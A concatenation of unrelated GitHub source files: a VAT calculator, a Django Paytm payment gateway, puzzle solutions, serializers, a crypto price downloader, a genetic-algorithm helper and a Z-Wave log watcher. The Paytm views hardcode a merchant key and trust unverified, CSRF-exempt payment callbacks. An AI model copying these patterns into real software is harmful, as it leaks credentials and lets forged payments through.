vat_entry_value)\r\n        display_result(exclude_vat, \"exclude\")\r\n    elif var_not_include_vat.get() == 1:\r\n        add_vat = calculate_vat_excluded(sum_entry_value, vat_entry_value)\r\n        display_result(add_vat, \"add\")\r\n\r\n    else:\r\n        warn_text = tb.Label(text=\"Please select VAT option\", bootstyle=\"warning\", font=(\"Helvetica\", 15)) \r\n        warn_text.grid(row=7, column=1)\r\n\r\ndef display_result(result, action):\r\n    \r\n    amount = tb.Label(text=\"Amount\", font=(\"Helvetica\", 18), bootstyle=\"default\")\r\n    net_amount = tb.Label(text=\"Net Amount\", font=(\"Helvetica\", 18), bootstyle=\"default\")\r\n    gross_amount = tb.Label(text=\"Gross Amount\", font=(\"Helvetica\", 18), bootstyle=\"default\")\r\n    vat_added = tb.Label(text=\"VAT Added\", font=(\"Helvetica\", 18), bootstyle=\"default\")\r\n    vat_excluded = tb.Label(text=\"VAT Excluded\", font=(\"Helvetica\", 18), bootstyle=\"default\")\r\n    \r\n    if action == \"exclude\":\r\n        amount.grid(row=7, column=0, pady=50)\r\n        vat_excluded.grid(row=7, column=1, pady=50)\r\n        net_amount.grid(row=7, column=2, pady=50)\r\n        show_result(result) \r\n    \r\n    elif action == \"add\":\r\n        amount.grid(row=7, column=0, pady=50)\r\n        vat_added.grid(row=7, column=1, pady=50)\r\n        gross_amount.grid(row=7, column=2, pady=50)\r\n        show_result(result)\r\n\r\ndef show_result(r):\r\n    initial_value = tb.Label(text=sum_entry.get(), font=(\"Helvetica\", 18), bootstyle=\"warning\")\r\n    vat_result = tb.Label(text=str(r[1]), font=(\"Helvetica\", 18), bootstyle=\"warning\")\r\n    value_result = tb.Label(text=str(r[0]), font=(\"Helvetica\", 18), bootstyle=\"warning\")\r\n    \r\n    initial_value.grid(row=8, column=0, pady=50)\r\n    vat_result.grid(row=8, column=1, pady=50)\r\n    value_result.grid(row=8, column=2, 
pady=50)\n \nif __name__ == \"__main__\":\n \n window = tb.Window(themename=\"darkly\")\n window.title(\"VAT Calculator\")\n window.geometry(\"600x800\")\n\n window.grid_columnconfigure((0,2), weight=1)\n\n # All entries\n sum_entry = tb.Entry()\n vat_entry = tb.Entry()\n\n #Style checkbuttons\n var_include_vat = tb.IntVar()\n var_not_include_vat = tb.IntVar()\n \n main()\n ","repo_name":"Acrofil/tkinter-vat-calculator","sub_path":"project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":5930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42282134230","text":"from django.shortcuts import render,redirect\nfrom Document.models import document\nfrom order_payload.models import order_id\nfrom order_success.models import order_success\nfrom order_failure.models import order_failure\nfrom order_refund.models import order_refund\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .checksum import *\nimport requests\nimport base64\nimport json\nimport cgi\nfrom os import environ\n\ndef home_page(request):\n context = {}\n #code for downloading Integration Docs File from Template\n try:\n doc = document.objects.get(name=\"Integration Docs\")\n context = {'file':doc}\n except:\n pass\n #order-paylod variables which are mandatory\n MERCHANT_KEY = 'jKc6NjVk0T1eZ0Bg'\n data_dict = {\n\n 'MID' :'KLUIOi74399454829212', #use your test or original MID from paytm buisness account\n 'ORDER_ID' : str(order_id.objects.get(name='ORDER_ID').id),\n 'CUST_ID' : 'Customer_ID', #use different ID for different customers\n 'TXN_AMOUNT' : '1.00', #change value accordingly\n 'CHANNEL_ID' : 'WEB',\n 'WEBSITE' : 'WEBSTAGING',\n 'INDUSTRY_TYPE_ID' : 'Retail',\n 'CALLBACK_URL' : 'http://127.0.0.1:8000/response/',#this for staging_purpose use your own response url\n\n }\n if request.method=='POST':\n data_dict['CHECKSUMHASH'] = generate_checksum(data_dict,MERCHANT_KEY)\n param_dict = data_dict\n paytmURL = \"https://securegw-stage.paytm.in/theia/processTransaction\"\n context['paytm_code_head']=\"
<html><head><title>Merchant Check Out Page</title></head><body><center><h1>Please do not refresh this page...</h1></center><form method='post' action='\"+paytmURL+\"' name='f1'>\"\n        context['paytm_code']=''\n        for key in param_dict:\n            context['paytm_code']+= \"<input type='hidden' name='\"+key+\"' value='\"+param_dict[key]+\"'>\"\n        context['paytm_code']+='</form><script type=\"text/javascript\">document.f1.submit();</script></body></html>
'\n print('Submitted Data')\n print(data_dict)\n request.session['CHECKSUMHASH'] = data_dict['CHECKSUMHASH']\n\n\n return render(request,\"index.html\",context)\n\n\n@csrf_exempt\ndef response_page(request):\n\n context={}\n MERCHANT_KEY = 'jKc6NjVk0T1eZ0Bg'\n\n data_dict = {\n\n 'MID' :'KLUIOi74399454829212', #use your test or original MID from paytm buisness account\n 'ORDER_ID' : str(order_id.objects.get(name='ORDER_ID').id),\n }\n\n data_dict['CHECKSUMHASH'] = generate_checksum(data_dict,MERCHANT_KEY)\n temp_value = order_id.objects.filter(name=\"ORDER_ID\")\n temp_value.update(id = int(order_id.objects.get(name=\"ORDER_ID\").id) + 1)\n response = requests.get('https://securegw-stage.paytm.in/merchant-status/getTxnStatus?'+'JsonData='+str(data_dict))\n\n try:\n respons_dict = response.json()\n except:\n return render(request,\"unsuccess.html\",context)\n print('\\n')\n print('Recieved from Paytm:')\n print(respons_dict)\n\n if 'GATEWAYNAME' in respons_dict:\n \tif respons_dict['GATEWAYNAME'] == 'WALLET':\n \t\trespons_dict['BANKNAME'] = 'null';\n\n #use a checksum verifying function if needed\n\n if respons_dict['RESPCODE'] == '01':\n context = {\n 'ORDER_ID':respons_dict['ORDERID'],\n 'TXN_AMOUNT':respons_dict['TXNAMOUNT']\n }\n order_success.objects.create(\n order_id = respons_dict['ORDERID'] ,\n txn_id = respons_dict['TXNID'] ,\n txn_amount = respons_dict['TXNAMOUNT'] ,\n txn_date = respons_dict['TXNDATE'] ,\n currency = request.POST['CURRENCY'] ,\n status = respons_dict['STATUS'] ,\n resp_msg = respons_dict['RESPMSG'] ,\n payment_mode = respons_dict['PAYMENTMODE'] ,\n gateway_name = respons_dict['GATEWAYNAME'] ,\n bank_txn_id = respons_dict['BANKTXNID'] ,\n bank_name = respons_dict['BANKNAME']\n )\n if float(respons_dict['REFUNDAMT'])!=0.0:\n order_refund.objects.create(\n order_id = respons_dict['ORDERID'] ,\n txn_id = respons_dict['TXNID'] ,\n txn_amount = respons_dict['TXNAMOUNT'] ,\n txn_date = respons_dict['TXNDATE'] ,\n currency = request.POST['CURRENCY'] ,\n status = respons_dict['STATUS'] ,\n resp_msg = respons_dict['RESPMSG'] ,\n payment_mode = respons_dict['PAYMENTMODE'] ,\n gateway_name = respons_dict['GATEWAYNAME'] ,\n bank_txn_id = respons_dict['BANKTXNID'] ,\n bank_name = respons_dict['BANKNAME'],\n refund_amount = respons_dict['REFUNDAMT']\n )\n refund_dict = {\n\n 'MID' : 'KLUIOi74399454829212',\n 'REFID' : str(order_id.objects.get(name='REF_ID')),\n 'TXNID' : respons_dict['TXNID'],\n 'ORDERID' : respons_dict['ORDERID'],\n 'REFUNDAMOUNT': respons_dict['REFUNDAMT'],\n 'TXNTYPE' : 'REFUND',\n\n }\n refund_dict['CHECKSUM'] = generate_refund_checksum(refund_dict, MERCHANT_KEY, salt=None)\n print('\\nchecksum genrated')\n refund_response = requests.get(\n \"https://securegw-stage.paytm.in/refund/HANDLER_INTERNAL/REFUND?\" +\n \"JsonData=\"+\n str(refund_dict)\n )\n refund_response_dict = refund_response.json()\n print(refund_response_dict)\n ref_id_var = order_id.objects.filter(name='REF_ID')\n ref_id_var.update(id = int(order_id.objects.get(name='REF_ID').id) + 1)\n\n return render(request,\"success.html\",context)\n\n else:\n respons_dict['REFUNDAMT']='1.0'\n if float(respons_dict['REFUNDAMT'])!=0.0:\n print(\"\\nEntered Refund App\")\n order_refund.objects.create(\n order_id = respons_dict['ORDERID'] ,\n txn_id = respons_dict['TXNID'] ,\n txn_amount = respons_dict['TXNAMOUNT'] ,\n txn_date = respons_dict['TXNDATE'] ,\n currency = request.POST['CURRENCY'] ,\n status = respons_dict['STATUS'] ,\n resp_msg = respons_dict['RESPMSG'] ,\n payment_mode = 
respons_dict['PAYMENTMODE'] ,\n                txn_date = respons_dict['TXNDATE'] ,\n                gateway_name = respons_dict['GATEWAYNAME'] ,\n                bank_txn_id = respons_dict['BANKTXNID'] ,\n                bank_name = respons_dict['BANKNAME'],\n                refund_amount =respons_dict['REFUNDAMT']\n                )\n            refund_dict = {\n\n                'MID' : 'KLUIOi74399454829212',\n                'REFID' : str(order_id.objects.get(name='REF_ID').id),\n                'TXNID' : respons_dict['TXNID'],\n                'ORDERID' : respons_dict['ORDERID'],\n                'REFUNDAMOUNT': respons_dict['REFUNDAMT'],\n                'TXNTYPE' : 'REFUND',\n\n            }\n            refund_dict['CHECKSUM'] = generate_refund_checksum(refund_dict, MERCHANT_KEY, salt=None)\n            refund_response = requests.get(\n                \"https://securegw-stage.paytm.in/refund/HANDLER_INTERNAL/REFUND?\" +\n                \"JsonData=\"+\n                str(refund_dict)\n            )\n            refund_response_dict = refund_response.json()\n            print(refund_response_dict)\n            ref_id_var = order_id.objects.filter(name='REF_ID')\n            ref_id_var.update(id = int(order_id.objects.get(name='REF_ID').id) + 1)\n\n        try:\n            order_failure.objects.create(\n\n                order_id = respons_dict['ORDERID'] ,\n                txn_id = respons_dict['TXNID'] ,\n                txn_amount = respons_dict['TXNAMOUNT'] ,\n                txn_date = respons_dict['TXNDATE'] ,\n                currency = request.POST['CURRENCY'] ,\n                status = respons_dict['STATUS'] ,\n                resp_msg = respons_dict['RESPMSG'] ,\n                payment_mode = respons_dict['PAYMENTMODE'] ,\n                gateway_name = respons_dict['GATEWAYNAME'] ,\n                bank_txn_id = respons_dict['BANKTXNID'] ,\n                bank_name = respons_dict['BANKNAME']\n                )\n\n        except:\n            order_failure.objects.create(\n\n                order_id = respons_dict['ORDERID'] ,\n                txn_amount = respons_dict['TXNAMOUNT'] ,\n                txn_date = respons_dict['TXNDATE'] ,\n                currency = request.POST['CURRENCY'] ,\n                status = respons_dict['STATUS'] ,\n                resp_msg = respons_dict['RESPMSG'] ,\n                gateway_name = respons_dict['GATEWAYNAME'] ,\n                bank_txn_id = respons_dict['BANKTXNID'] ,\n                bank_name = respons_dict['BANKNAME']\n                )\n        print(respons_dict['RESPMSG'])\n\n        return render(request,\"unsuccess.html\",context)\n\n\n    return render(request,\"success.html\",context)\n","repo_name":"ajaydevofficial/payment-gateway","sub_path":"processor/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"37033578214","text":"fact_vals = {}\n\ndef fact(n):\n    if n in fact_vals.keys():\n        return fact_vals[n]\n    else:\n        if n == 0:\n            fact_vals[n] = 1\n        else:\n            fact_vals[n] = n * fact(n - 1)\n        return fact_vals[n]\n\ndef choose(n, r):\n    return int(fact(n) / (fact(r) * fact(n - r)))\n\nimport time\nstart_time = time.time()\n\nsum = 0\nfor n in range(1, 101):\n    for r in range(0, n + 1):\n        if choose(n, r) > 1000000:\n            sum += 1\n\nprint(int((time.time() - start_time) * 1000), 'milliseconds')\nprint(sum)\n","repo_name":"nicholasiasso/Euler","sub_path":"completed/combo selections.py","file_name":"combo selections.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"41263460820","text":"from django.shortcuts import render, redirect\nfrom core.form import HeroForm\nimport random\n\n\n# Create your views here.\ndef home(request):\n    return render(request, 'core/home.html')\n\n\ndef create_hero(request):\n    if request.method == 'POST':\n        form = HeroForm(request.POST)\n        if form.is_valid():\n            hero = form.save(commit=False)\n            hero.atk = random.randint(50, 200)\n            hero.save()\n\n            return redirect('home')\n    else:\n        form = HeroForm()\n    return render(request, 'core/create_hero.html', {'form': 
form})\n","repo_name":"JungeunK-9999/yongsaExample","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13877490704","text":"from rest_framework import serializers\nfrom . import models\n\n\nclass RoleSerializer(serializers.ModelSerializer):\n class Meta:\n model = models.Role\n fields = '__all__'\n\n\nclass ClientSerializer(serializers.ModelSerializer):\n class Meta:\n model = models.Client\n fields = (\n 'id', 'name', 'email'\n )\n\n\nclass CountersignSerializer(serializers.ModelSerializer):\n user = serializers.PrimaryKeyRelatedField(\n queryset=models.MyUser.objects.all(),\n help_text='user id',\n )\n contract = serializers.PrimaryKeyRelatedField(\n queryset=models.Contract.objects.all(),\n help_text='contract id',\n )\n\n class Meta:\n model = models.Countersign\n fields = (\n 'id', 'user', 'contract', 'message', 'is_confirmed',\n )\n\n\nclass ReivewSerializer(serializers.ModelSerializer):\n user = serializers.PrimaryKeyRelatedField(\n queryset=models.MyUser.objects.all(),\n help_text='user id',\n )\n contract = serializers.PrimaryKeyRelatedField(\n queryset=models.Contract.objects.all(),\n help_text='contract id',\n )\n\n class Meta:\n model = models.Review\n fields = (\n 'id', 'user', 'contract', 'message', 'is_confirmed',\n )\n\n\nclass SignSerializer(serializers.ModelSerializer):\n user = serializers.PrimaryKeyRelatedField(\n queryset=models.MyUser.objects.all(),\n help_text='user id',\n )\n contract = serializers.PrimaryKeyRelatedField(\n queryset=models.Contract.objects.all(),\n help_text='contract id',\n )\n\n class Meta:\n model = models.Sign\n fields = (\n 'id', 'user', 'contract', 'message', 'is_confirmed',\n )\n\n\nclass ContractSerializer(serializers.ModelSerializer):\n # author = serializers.SlugRelatedField(\n # slug_field='username',\n # queryset=models.MyUser.objects.all()\n # )\n author = serializers.PrimaryKeyRelatedField(\n queryset=models.MyUser.objects.all(),\n help_text='user id of the author',\n )\n countersigns = CountersignSerializer(many=True, read_only=True)\n reviews = ReivewSerializer(many=True, read_only=True)\n signs = SignSerializer(many=True, read_only=True)\n # clients = serializers.SlugRelatedField(\n # many=True,\n # slug_field='name',\n # queryset=models.Client.objects.all()\n # )\n clients = serializers.PrimaryKeyRelatedField(\n many=True,\n queryset=models.Client.objects.all(),\n help_text='id of each client',\n )\n\n class Meta:\n model = models.Contract\n fields = (\n 'id', 'title', 'date_begin', 'date_end', 'content',\n 'clients', 'status', 'author',\n 'countersigns', 'reviews', 'signs'\n )\n\n\nclass RegisterSerializer(serializers.Serializer):\n username = serializers.CharField(max_length=50, min_length=1)\n email = serializers.EmailField()\n password = serializers.CharField(max_length=50, min_length=6, write_only=True)\n\n def validate(self, data):\n if models.MyUser.objects.filter(username=data['username']).count() > 0:\n raise serializers.ValidationError('username already taken.')\n if models.MyUser.objects.filter(email=data['email']).count() > 0:\n raise serializers.ValidationError('email already taken.')\n return data\n\n def create(self, validated_data):\n user = models.MyUser.objects.create_user(\n validated_data['email'], validated_data['username'], validated_data['password'])\n return user\n\n\nclass MyUserSerializer(serializers.ModelSerializer):\n class Meta:\n model = models.MyUser\n 
fields = (\n 'email', 'username', 'role', 'id',\n 'contracts_created', 'countersigns', 'reviews', 'signs',\n )\n # role = serializers.SlugRelatedField(\n # slug_field='name', queryset=models.Role.objects.all())\n role = serializers.PrimaryKeyRelatedField(queryset=models.Role.objects.all(), help_text='role id')\n contracts_created = ContractSerializer(many=True, read_only=True)\n countersigns = CountersignSerializer(many=True, read_only=True)\n reviews = ReivewSerializer(many=True, read_only=True)\n signs = SignSerializer(many=True, read_only=True)\n\n\nclass PwdSerializer(serializers.Serializer):\n password = serializers.CharField(\n min_length=6, max_length=50, write_only=True)\n","repo_name":"cp-shen/contract_management_rest","sub_path":"contract_app/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":4431,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"74284621605","text":"import pandas as pd\r\nimport yfinance as yf\r\nfrom yahoofinancials import YahooFinancials\r\nfrom pandas_datareader import data as pdr\r\n\r\n#References\r\n#https://pypi.org/project/yahoofinancials/\r\n#https://pypi.org/project/yfinance/\r\n#https://www.analyticsvidhya.com/blog/2021/06/download-financial-dataset-using-yahoo-finance-in-python-a-complete-guide/\r\n\r\n#Get BTC-USD daily data from YahooFinance for specific dates\r\n# btc_df = yf.download('BTC-USD',\r\n# start='2019-01-01',\r\n# end='2022-02-20',\r\n# progress=False,\r\n# )\r\n# btc_df.head()\r\n\r\n#Or get BTC-USD daily data for all times\r\ndata = yf.download( # or pdr.get_data_yahoo(...\r\n # tickers list or string as well\r\n tickers = \"BTC-USD ETH-USD USDT-USD BNB-USD USDC-USD XRP-USD ADA-USD SHIB-USD\",\r\n\r\n # use \"period\" instead of start/end\r\n # valid periods: 1d,5d,1mo,3mo,6mo,1y,2y,5y,10y,ytd,max\r\n # (optional, default is '1mo')\r\n period = \"max\",\r\n\r\n # fetch data by interval (including intraday if period < 60 days)\r\n # valid intervals: 1m,2m,5m,15m,30m,60m,90m,1h,1d,5d,1wk,1mo,3mo\r\n # (optional, default is '1d')\r\n interval = \"1d\",\r\n\r\n start=\"2020-01-01\",\r\n\r\n end=\"2022-02-20\",\r\n\r\n # group by ticker (to access via data['SPY'])\r\n # (optional, default is 'column')\r\n group_by = 'ticker',\r\n\r\n # adjust all OHLC automatically\r\n # (optional, default is False)\r\n auto_adjust = True,\r\n\r\n # download pre/post regular market hours data\r\n # (optional, default is False)\r\n prepost = True,\r\n\r\n # use threads for mass downloading? 
(True/False/Integer)\r\n    # (optional, default is True)\r\n    threads = True,\r\n\r\n    # proxy URL scheme to use when downloading?\r\n    # (optional, default is None)\r\n    proxy = None\r\n    )\r\n\r\n# yf.pdr_override() # <== that's all it takes :-)\r\n# data = pdr.get_data_yahoo(\"BTC-USD ETH-USD USDT-USD BNB-USD USDC-USD XRP-USD ADA-USD SHIB-USD\", start=\"2020-01-01\", end=\"2022-02-20\")\r\n\r\nprint (data)\r\ndata.to_csv('yahoo_data.csv')\r\n# data.to_csv (r'export_dataframe.csv', index = False, header=True)\r\n\r\n","repo_name":"ldtcooper/crypto-arbitrage","sub_path":"data_collection.py","file_name":"data_collection.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"}
{"seq_id":"15030817360","text":"import random\nimport network\nfrom keras import models\nfrom keras import layers\nfrom utils import Weights\n\ndef get_partner(partner_1, num_networks):\n    allowed_partners = list(range(num_networks))\n    allowed_partners.remove(partner_1)\n    partner_2 = random.choice(allowed_partners)\n    \n    return partner_2\n\n\ndef crossingover(model1, model2):\n    result = []\n\n    for layer_idx in range(len(model1.layers)):\n        m1_weights = Weights(model1.layers[layer_idx])\n        m2_weights = Weights(model2.layers[layer_idx])\n        m1_weights_list = m1_weights.get_weights_list()\n        m2_weights_list = m2_weights.get_weights_list()\n        \n        if len(m1_weights_list) == 0:\n            continue\n        \n        separate_idx = random.randint(0, len(m1_weights_list) - 1)\n        for weight_idx in range(0, separate_idx):\n            result.append(m1_weights_list[weight_idx])\n        for weight_idx in range(separate_idx, len(m1_weights_list)):\n            result.append(m2_weights_list[weight_idx])\n    \n    return result\n\n\ndef mutation(weights, num_weights, mutation_value):\n    idx = random.sample(range(len(weights)), num_weights)\n    \n    for i in idx:\n        direction = random.randint(0, 1)\n        if direction == 0:\n            weights[i] -= mutation_value\n        else:\n            weights[i] += mutation_value\n\n\ndef selection(num_networks, rewards, num_selected, num_random, num_new_random, tesnsor_size):\n    result = []\n    nn_name_tmpl = 'nn{}.h5'\n\n    for i in range(num_selected - num_random - num_new_random):\n        best_network_idx = rewards.index(max(rewards))\n        nn = models.load_model(nn_name_tmpl.format(best_network_idx))\n        nn.save(nn_name_tmpl.format(i))\n        rewards[best_network_idx] = 0\n\n    for i in range(num_random):\n        random_idx = random.randint(0, num_networks - 1)\n        nn = models.load_model(nn_name_tmpl.format(random_idx))\n        nn.save(nn_name_tmpl.format(num_selected - num_random - num_new_random + i))\n\n    for i in range(num_new_random):\n        new_model = network.generate_model(tesnsor_size)\n        new_model.save(nn_name_tmpl.format(num_selected - num_new_random + i))\n\n    return result\n\n\ndef generate_child(model1, model2, tesnsor_size, layers_info, cfg):\n    child_weights = crossingover(model1, model2)\n    mutation(child_weights, cfg.NUM_MUTATION_WEIGHTS, cfg.MUTATION_FACTOR)\n    child_model = network.generate_model(tesnsor_size)\n    \n    for layer_idx in range(len(child_model.layers)):\n        weights_mtrx = layers_info[layer_idx].get_weights_mtrx(\n            child_weights[:layers_info[layer_idx].size()])\n        child_model.layers[layer_idx].set_weights(weights_mtrx)\n        child_weights = child_weights[layers_info[layer_idx].size():]\n    \n    return 
child_model","repo_name":"megagnom37/NN_GA","sub_path":"cart_pole_release/geneticalg.py","file_name":"geneticalg.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"10808571838","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nx=np.linspace(-3,3,50)\r\ny1=x**2\r\ny2=2*x+1\r\nplt.figure()\r\n## annotate the axes\r\nplt.xlim((-1,2))\r\nticks=np.linspace(-1,2,5)\r\nplt.xticks(ticks)\r\nplt.yticks([-6,-4,-1.5,2,8],['really bad','bad','normal','good','really good'])\r\nplt.xlabel('yang')\r\nplt.ylabel('yang2')\r\n## adjust the axis spines\r\nax=plt.gca()\r\nax.spines['top'].set_color('none')\r\nax.spines['right'].set_color('none')\r\nax.xaxis.set_ticks_position('bottom')\r\nax.spines['bottom'].set_position(('data',0))\r\nax.spines['left'].set_position(('data',0))\r\n\r\nplt.plot(x,y1,color='red',linestyle='--',label='yang1')\r\nplt.plot(x,y2,label='yang2')\r\nplt.legend(labels=['quxian','zhixian'],loc='best')## legend line names\r\n## annotate a point\r\nx0=1.25\r\ny0=2*x0+1\r\nplt.scatter(x0,y0,s=50)\r\nplt.plot([x0,x0],[y0,0],'k--',linewidth=2)\r\nplt.annotate(r'2x+1=%s'%y0,xy=(x0,y0),xycoords='data',xytext=(+30,-30),\r\n             textcoords='offset points',fontsize=10,\r\n             arrowprops=dict(arrowstyle='->',connectionstyle=\"arc3,rad=.2\"))\r\nplt.show()","repo_name":"yhjflower/numpy","sub_path":"matplt.py","file_name":"matplt.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"13097737635","text":"from sys import stdin\n\n\ndef solution(N, items):\n    items.sort()\n\n    if 0 <= items[0] <= items[-1]:\n        return items[0], items[1], items[2]\n    if items[0] <= items[-1] <= 0:\n        return items[-3], items[-2], items[-1]\n\n    best = float('inf')\n    best_combo = None\n    for middle in range(1, N-1):\n        left, right = middle-1, middle+1\n        while True:\n            # print(left, middle, right)\n            v = items[left] + items[middle] + items[right]\n            if abs(v) < best:\n                best = abs(v)\n                best_combo = items[left], items[middle], items[right]\n            if v == 0:\n                break\n            if v < 0:\n                right += 1\n            if v > 0:\n                left -= 1\n            if left < 0 or right >= N:\n                break\n        if best == 0:\n            break\n    return best_combo\n\n\nN = int(stdin.readline())\nitems = [int(c) for c in stdin.readline().strip().split(' ')]\nprint(' '.join(str(i) for i in solution(N, items)))\n\n\n# import random\n# from itertools import combinations\n#\n# def dum(N, items):\n#     best = float('inf')\n#     comb = None\n#     for i in combinations(items, 3):\n#         if abs(sum(i)) < best:\n#             best = abs(sum(i))\n#             comb = i\n#     return comb\n#\n# while True:\n#     print('__________________________________')\n#     items = [random.randint(-20, 20) for _ in range(10)]\n#     items.sort()\n#     print(items)\n#     a, b = solution(len(items), items), dum(len(items), items)\n#     print(a, b)\n#     print(sum(a), sum(b))\n#     if abs(sum(a)) != abs(sum(b)):\n#         break\n# print(dum(len(items), items))\n# \"\"\"\n# 5\n# -5 -2 -1 4 98\n# 8\n# -10 -5 -2 -1 6 7 8 8\n# \"\"\"\n","repo_name":"grasshopperTrainer/coding_practice","sub_path":"baekjoon/accepted/투 포인터/2473 세 용액.py","file_name":"2473 세 용액.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
{"seq_id":"74292149284","text":"import sys,math\ninput=sys.stdin.readline\n\nn=int(input())\nres=math.factorial(n)\ncount=0\nfor i in str(res)[::-1]: # iterate over the digits in reverse\n    if i != '0':\n        break\n    count 
+=1\nprint(count)","repo_name":"MaiBoii/Algorithm_Study","sub_path":"동적할당법/11724.py","file_name":"11724.py","file_ext":"py","file_size_in_byte":190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18668192320","text":"#!/usr/bin/env python3\n# \\author fms13\n# \\date April 30, 2020\n#\n# \\brief Opens a file and tries a number of matching lines in a row\n#\n# Under development, not working currently.\n#\n# The script is looking for the first and the last of these three lines as an example:\n# Node004, Received a MultiChannelEncap from node 4, endpoint 1\n# Node004, Received SwitchBinary report from node 4: level=On\n# Node004, Refreshed Value: old value=true, new value=true, type=bool\n#\n# The node number and the endpoints to be checked can be configured.\n\nimport sys\nimport time\nimport argparse\nimport pycurl\nimport json\nimport io\n\nfrom watchdog.events import FileSystemEventHandler\nfrom watchdog.observers import Observer\n\nimport collections\n\n# search line:\nnode_enpoint_numbers = [ [ 4, [1, 2] ] ]\nsearch_strings_1 = []\n\n# the Home Assistant authentication token, to be obtained from\nhome_assistant_authentication_token = \"\"\n\n# ip and port of Home Assistant instance, e.g. 192.168.0.10:8123\nhome_assistant_ip_port = \"\"\n\nif __name__ == \"__main__\":\n\n# parser = argparse.ArgumentParser()\n# parser.add_argument(\"home_assistant_url\", type=str, help=\"the URL of the Home Assistant instance to call in case an override was detected\")\n\n # directory where file is:\n path = '/home/homeassistant/.homeassistant/'\n path = './'\n file_name = \"OZW_Log.txt\"\n path_and_file_name = path + file_name\n\n # open file\n f = open(path_and_file_name, 'r')\n\n # go to the end of the file:\n f.seek(0, 2)\n\n print(\"checking for these nodes and endpoints \")\n for node in node_enpoint_numbers:\n for endpoint in node[1]:\n print(f\"Node{node[0]:03d}, endpoint {endpoint}\")\n\n # create the strings wer're searching for in step 1:\n print(\"search strings for step 1:\")\n for node in node_enpoint_numbers:\n search_strings_1.append(f\"Node{node[0]:03d}, Refreshed Value: old value=false, new value=true, type=bool\")\n print(search_strings_1[-1])\n\n # create a list of strings to store the last three lines of the file:\n lines = collections.deque(maxlen=3)\n\n my_event_handler = FileSystemEventHandler()\n\n def on_modified(event):\n #print(f\"{event.src_path} has been modified\")\n if event.src_path == path_and_file_name:\n print(\"new Z-Wave messages\")\n\n while True:\n buf = f.readline()\n #print(\"buf: \", buf)\n if not buf:\n break\n\n lines.append(buf)\n\n # check if one of the search strings is in the last line:\n for idx, search_string in enumerate(search_strings_1):\n #print(f\"searching for {search_string} in {buf}\")\n if lines[-1].find(search_string) != -1:\n #print(\"found search string 1: \", buf)\n # check for endpoints in lines that came in two lines before:\n for endpoint in node_enpoint_numbers[idx][1]:\n node = node_enpoint_numbers[idx][0]\n search_string_2 = f\"Node{node:03d}, Received a MultiChannelEncap from node {node}, endpoint {endpoint}\"\n #print(f\"step 2: searching for {search_string_2} in {lines[-3]}\")\n if lines[-3].find(search_string_2) != -1:\n print(\"found search string 2 in: \", lines[-3])\n\n # using pycurl for this curl POST request:\n # #print(f\"calling /usr/bin/curl -X POST -H \\\"Authorization: Bearer {home_assistant_authentication_token}\\\" -H \\\"Content-Type: application/json\\\" 
-d \\'{{\\\"state\\\": \\\"on\\\"}}\\' http://{home_assistant_ip_port}/api/states/input_boolean.override_node{node}_endpoint{endpoint}\")\n pycurl_connect = pycurl.Curl()\n pycurl_connect.setopt(pycurl.URL, f\"http://{home_assistant_ip_port}/api/states/input_boolean.override_node{node}_endpoint{endpoint}\")\n pycurl_connect.setopt(pycurl.HTTPHEADER, [f'Authorization: Bearer {home_assistant_authentication_token}',\n 'Content-Type: application/json'])\n pycurl_connect.setopt(pycurl.POST, 1)\n data = json.dumps({\"state\": \"on\"})\n data_as_file_object = io.StringIO(data)\n pycurl_connect.setopt(pycurl.READDATA, data_as_file_object)\n pycurl_connect.setopt(pycurl.POSTFIELDSIZE, len(data))\n pycurl_connect.perform()\n\n print(\"done.\")\n\n my_event_handler.on_modified = on_modified\n\n my_observer = Observer()\n my_observer.schedule(my_event_handler, path, recursive=False)\n\n print(\"Starting observer\")\n my_observer.start()\n\n try:\n while True:\n time.sleep(1)\n except KeyboardInterrupt:\n my_observer.stop()\n my_observer.join()\n\n\n f.close()","repo_name":"fms13/mc-control","sub_path":"home-assistant/detect-event-in-OZW_Log.py","file_name":"detect-event-in-OZW_Log.py","file_ext":"py","file_size_in_byte":5084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27677909026","text":"import subprocess\nimport os\nimport datetime\nimport time\nfrom bench_util import *\nfrom bench import *\n\nPROJECT_ABS_PATH = PROJECT_PATH\n\n\nclass BaseRun:\n def __init__(self, exp_id) -> None:\n self.exp_id = exp_id\n\n def run(self,):\n raise NotImplementedError\n\n\nclass Experiment:\n registered_id = []\n\n def __init__(self, exp_id) -> None:\n if exp_id not in self.registered_id:\n self.registered_id.append(exp_id)\n else:\n raise Exception(\"repeated exp ID\")\n\n self.exp_id = exp_id\n self.log_dir = None\n pass\n\n def _BeforeStartAllRun(self, ) -> None:\n raise NotImplementedError\n\n def _SortRuns(self, runs):\n raise NotImplementedError\n\n def _RunHook(self, previous_run, next_run):\n raise NotImplementedError\n\n def _AllRuns(self,):\n raise NotImplementedError\n\n def SetLogDir(self, log_dir):\n self.log_dir = log_dir\n\n def RunExperiment(self):\n if self.log_dir is None:\n raise Exception(\"invalid log dir\")\n 